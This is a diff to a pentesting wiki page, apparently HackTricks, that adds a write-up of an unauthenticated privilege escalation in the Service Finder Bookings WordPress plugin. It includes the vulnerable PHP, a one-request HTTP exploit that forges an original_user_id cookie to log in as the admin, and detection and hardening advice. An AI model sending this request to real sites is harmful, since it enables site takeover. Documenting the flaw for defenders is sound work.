Add content from: Unpatched Privilege Escalation in Service Finder Bookings Pl...

HackTricks News Bot · HackTricks News Bot · commit 3a9011a75e0c · 2025-09-04T12:55:48.000Z
- Remove searchindex.js (auto-generated file)
diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md
@@ -608,6 +608,81 @@ add_action( 'profile_update', function( $user_id ) {
 
 ---
 
+### Unauthenticated privilege escalation via cookie‑trusted user switching on public init (Service Finder “sf-booking”)
+
+Some plugins wire user-switching helpers to the public `init` hook and derive identity from a client-controlled cookie. If the code calls `wp_set_auth_cookie()` without verifying authentication, capability and a valid nonce, any unauthenticated visitor can force login as an arbitrary user ID.
+
+Typical vulnerable pattern (simplified from Service Finder Bookings ≤ 6.1):
+
+```php
+function service_finder_submit_user_form(){
+    if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) {
+        $user_id = intval( sanitize_text_field($_GET['switch_user']) );
+        service_finder_switch_user($user_id);
+    }
+    if ( isset($_GET['switch_back']) ) {
+        service_finder_switch_back();
+    }
+}
+add_action('init', 'service_finder_submit_user_form');
+
+function service_finder_switch_back() {
+    if ( isset($_COOKIE['original_user_id']) ) {
+        $uid = intval($_COOKIE['original_user_id']);
+        if ( get_userdata($uid) ) {
+            wp_set_current_user($uid);
+            wp_set_auth_cookie($uid);  // 🔥 sets auth for attacker-chosen UID
+            do_action('wp_login', get_userdata($uid)->user_login, get_userdata($uid));
+            setcookie('original_user_id', '', time() - 3600, '/');
+            wp_redirect( admin_url('admin.php?page=candidates') );
+            exit;
+        }
+        wp_die('Original user not found.');
+    }
+    wp_die('No original user found to switch back to.');
+}
+```
+
+Why it’s exploitable
+
+- Public `init` hook makes the handler reachable by unauthenticated users (no `is_user_logged_in()` guard).
+- Identity is derived from a client-modifiable cookie (`original_user_id`).
+- Direct call to `wp_set_auth_cookie($uid)` logs the requester in as that user without any capability/nonce checks.
+
+Exploitation (unauthenticated)
+
+```http
+GET /?switch_back=1 HTTP/1.1
+Host: victim.example
+Cookie: original_user_id=1
+User-Agent: PoC
+Connection: close
+```
+
+Expected success indicators
+
+- Redirect to a plugin page (e.g., `/wp-admin/admin.php?page=candidates`).
+- New WordPress auth cookies issued; browser session becomes that user (ID 1 is commonly the first admin).
+
+Detection checklist
+
+- Access logs showing `?switch_back` (or `?switch_user=<id>`) in unauthenticated requests immediately followed by WordPress auth cookie issuance and a redirect to admin pages.
+- Inbound requests carrying `Cookie: original_user_id=*` on public endpoints.
+- Error pages triggered by `wp_die('Original user not found')` / `wp_die('No original user found…')` indicating probing.
+
+Hardening
+
+- Do not place login/state-changing flows on public `init`. Use `admin_post_*`/`wp_ajax_*` handlers and enforce `is_user_logged_in()` plus strong capability checks (e.g., `current_user_can('administrator')`).
+- Never derive identity from client cookies. Store the “original user” server-side (user meta) or use a signed, expiring token bound to the actor and verify it.
+- Make state-changing actions POST-only and require CSRF nonces (`check_admin_referer()` / `wp_verify_nonce()`).
+- Remove any `wp_ajax_nopriv_` exposure for these flows.
+
+Impact
+
+- Unauthenticated privilege escalation to any account, including administrator, leading to full site takeover.
+
+---
+
 ### WAF considerations for WordPress/plugin CVEs
 
 Generic edge/server WAFs are tuned for broad patterns (SQLi, XSS, LFI). Many high‑impact WordPress/plugin flaws are application-specific logic/auth bugs that look like benign traffic unless the engine understands WordPress routes and plugin semantics.
@@ -722,5 +797,7 @@ The server responds with the contents of `wp-config.php`, leaking DB credentials
 - [Hosting security tested: 87.8% of vulnerability exploits bypassed hosting defenses](https://patchstack.com/articles/hosting-security-tested-87-percent-of-vulnerability-exploits-bypassed-hosting-defenses/)
 - [WooCommerce Payments ≤ 5.6.1 – Unauth privilege escalation via trusted header (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/woocommerce-payments/vulnerability/wordpress-woocommerce-payments-plugin-5-6-1-unauthenticated-privilege-escalation-vulnerability)
 - [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/)
+- [Unpatched Privilege Escalation in Service Finder Bookings Plugin](https://patchstack.com/articles/unpatched-privilege-escalation-in-service-finder-bookings-plugin/)
+- [Service Finder Bookings privilege escalation – Patchstack DB entry](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-booking-6-0-privilege-escalation-vulnerability)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
